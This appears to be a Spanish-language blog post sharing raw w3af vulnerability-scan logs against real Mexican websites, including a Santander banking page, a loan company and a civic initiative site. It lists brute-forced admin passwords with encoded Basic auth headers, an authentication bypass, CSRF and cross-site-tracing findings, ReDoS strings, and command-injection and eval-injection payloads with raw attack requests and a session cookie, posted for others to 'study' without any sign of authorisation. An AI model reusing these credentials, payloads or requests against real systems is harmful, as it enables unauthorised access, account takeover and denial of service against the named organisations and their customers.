[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 102.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 104.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 105.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 107.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 108.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 106.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 110.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 109.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 111.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 112.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 113.
[Thu 26 May 2011 10:06:00 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.
[Thu 26 May 2011 10:06:00 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:06:00 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] Found 2 URLs and 3 different points of injection.
[Thu 26 May 2011 10:06:00 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:00 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/ | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: POST | Parameters: (miURL="/schmexapp...", pag="/schmexapp...", login.claveCliente="", login.NIP="", irAmodulo="1")
[Thu 26 May 2011 10:06:30 PM CDT] Too many retries (2) while requesting: http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:43 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Thu 26 May 2011 10:07:16 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:07:16 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:07:16 PM CDT] The URL "http://www.santander.com.mx/NuevaVersion/" has the following allowed methods: GET, HEAD, POST.
[Thu 26 May 2011 10:07:17 PM CDT] The thread: raised an exception while running the request: bound method localFileInclude._sendMutant of >

basicAuthBrute auth

Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)

Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)

Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)

htaccessMethods=auth

The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.

Hay se las dejo para su estudio.

Saludos Mundo libre.

Provident Vulnerable a ReDoS

Saludos Mundo libre.

He aqui otre web vulnerable a ReDoS y a xrfs:get_xsrf y xst: xst
Esta es una empresa que sededica al prestamo de dinero enfocado alas amas de casa
scaneo:

http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.collectCookies

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.httpAuthDetect

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.error500

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.serverHeader

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.allowedMethods

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.frontpage_version

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.passwordProfiling

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.getMails

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.lang

[Thu 26 May 2011 12:08:19 PM EDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:24 PM EDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:38 PM EDT] The page language is: es

[Thu 26 May 2011 12:08:39 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:08:46 PM EDT] Starting formAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Starting basicAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Found 3 URLs and 5 different points of injection.

[Thu 26 May 2011 12:08:46 PM EDT] The list of URLs is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:46 PM EDT] The list of fuzzable requests is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1 | Method: GET | Parameters: (gclid="CJD-8bTDhq...")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="10000")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="3900")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search | Method: GET | Parameters: (q="")

[Thu 26 May 2011 12:08:56 PM EDT] The web application sent a persistent cookie.

[Thu 26 May 2011 12:08:56 PM EDT] The following scripts are vulnerable to a trivial form of XSRF:

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/search is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:10:02 PM EDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 to 20.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/campaign_lp_v1" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 1.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 21.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 22.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/search" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 32.

[Thu 26 May 2011 12:11:02 PM EDT] A possible ReDoS was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=11111111111111111111111111111111199%21". . Please review manually. This information was found in the request with id 239.

[Thu 26 May 2011 12:11:02 PM EDT] ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.

[Thu 26 May 2011 12:13:22 PM EDT] A possible OS Commanding was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=%26%26ping+-c+9+localhost".Please review manually. This information was found in the request with id 327.

[Thu 26 May 2011 12:14:35 PM EDT] eval() input injection was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 569.

[Thu 26 May 2011 12:16:06 PM EDT] The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.

[Thu 26 May 2011 12:19:00 PM EDT] Password profiling TOP 100:

[Thu 26 May 2011 12:19:00 PM EDT] - [1] Loan with 9024 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [2] Pago with 3028 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [3] Amount with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [4] rate with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [5] Home with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [6] Weekly with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [7] Type with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [8] service with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [9] Interest with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [10] Repayment with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [11] charges with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [12] Term with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [13] Breakdown with 3008 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [14] pago with 1506 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [15] Primer with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [17] Regular with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [18] Seleccionar with 1504 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [19] ClickTale with 1416 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [20] document with 1320 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [21] script with 1300 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [23] https with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [24] part with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [25] text with 944 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [26] javascript with 708 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [27] type with 695 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [30] class with 540 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [32] function with 492 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [33] sitio with 474 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [34] clicktale with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [35] Bottom with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [36] site with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [37] endif with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [38] protocol with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [39] location with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [40] push with 472 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [41] write with 376 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [43] Mexico with 356 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [45] Buscar with 332 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [50] favor with 290 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [51] cript with 280 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [52] typeof with 256 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [56] segment with 240 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [58] Promociones with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [59] Nuestro with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [60] Noticias with 238 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [63] Imprimir with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [64] contigo with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [65] Seguridad with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [66] Mapa with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [67] compromiso with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [68] Busque with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [70] frecuentes with 237 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [73] pantherssl with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [74] Preguntas with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [75] CURRENCY with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [76] 3Cscript with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [78] WRb6 with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [80] href with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [81] stylesheet with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [82] getElementsByTagName with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [84] media with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [85] getTime with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [86] unescape with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [87] Nuestra with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [88] Date with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [89] parentNode with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [90] 20src with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [91] analytics with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [92] ClickTaleSSL with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [93] Accesibilidad with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [94] www02 with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [95] screen with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [96] Usuario with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [98] 20type with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [99] Inicio with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] - [100] async with 236 repetitions.

[Thu 26 May 2011 12:19:00 PM EDT] The cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/" was sent by these URLs:

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/ZEPQu.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/EEfFv

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_bin/_vti_aut/author.dll

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] Finished scanning process.

redos: Redos Vulneravilidad.

ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.

GET http://www.provident.com.mx/pages/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21 HTTP/1.1

Host: www.provident.com.mx

Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;

Accept-encoding: identity

Accept: */*

User-agent: w3af.sourceforge.net

xrfs:get_xsrf

The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.

xst: xst

The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.

TRACE http://www.provident.com.mx/pages/?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ HTTP/1.1

Host: www.provident.com.mx

Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;

Accept-encoding: identity

Accept: */*

User-agent: w3af.sourceforge.net

Liga de Informacion:http://en.wikipedia.org/wiki/ReDoS

Hay se las Dejo

Saludos Mundo Libre.

miércoles, 25 de mayo de 2011

Iniciativa Mexico vulnerable

Saludos Mundo Libre.

Iniciativa Mexico vulnerable

http://www.iniciativamexico.org

[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.error500
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.getMails
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.lang
[Wed 25 May 2011 03:26:56 PM CDT] The page language is: es
[Wed 25 May 2011 03:26:57 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:27:18 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:27:18 PM CDT] New URL found by frontpage_version plugin: http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] Starting formAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Starting basicAuthBrute plugin execution.
[Wed 25 May 2011 03:27:18 PM CDT] Found 4 URLs and 10 different points of injection.
[Wed 25 May 2011 03:27:18 PM CDT] The list of URLs is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:27:18 PM CDT] The list of fuzzable requests is:
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/_vti_inf.html | Method: GET
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="1", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="0", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="3", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/registro_corto | Method: POST | Parameters: (data[usuario][nombre]="Tu Nombre:", data[iniciativa][tu_iniciativa_es]="2", data[registro]="0", data[iniciativa][describe_ini]="Describe t...", data[iniciativa][categorias]="5", data[formulario]="ok", data[iniciativa][nombre_ini]="Título de...", data[usuario][mail1]="Tu e-mail:")
[Wed 25 May 2011 03:27:18 PM CDT] - http://www.iniciativamexico.org/save_invitacion | Method: POST | Parameters: (data[Friend][mail]="E-mail de ...", _method="POST", data[Prospect][nombre]="Tu Nombre ...", data[Prospect][mail]="Tu e-mail:")
[Wed 25 May 2011 03:27:25 PM CDT] The web application sent a persistent cookie.
[Wed 25 May 2011 03:27:25 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:25 PM CDT] - The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:27:45 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:48 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:51 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:53 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:55 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:57 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:27:59 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:28:01 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:06 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/save_invitacion
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/registro_corto is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] The URL: http://www.iniciativamexico.org/save_invitacion is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Wed 25 May 2011 03:31:06 PM CDT] A fake FrontPage Configuration Information file was found at: "http://www.iniciativamexico.org/_vti_inf.html". This may be an indication of a honeypot, a WAF or an IPS. This information was found in the request with id 244.
[Wed 25 May 2011 03:31:06 PM CDT] The server header for the remote web server is: "nginx/0.7.67". This information was found in the request with id 194.
[Wed 25 May 2011 03:31:06 PM CDT] The URL "http://www.iniciativamexico.org/" has the following allowed methods: GET, HEAD, POST.
[Wed 25 May 2011 03:31:36 PM CDT] Too many retries (2) while requesting: http://www.iniciativamexico.org/registro_corto
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:31:54 PM CDT] localCache.py : Could not open cache for request.
[Wed 25 May 2011 03:45:05 PM CDT] localCache.py : Could not open cache for request.
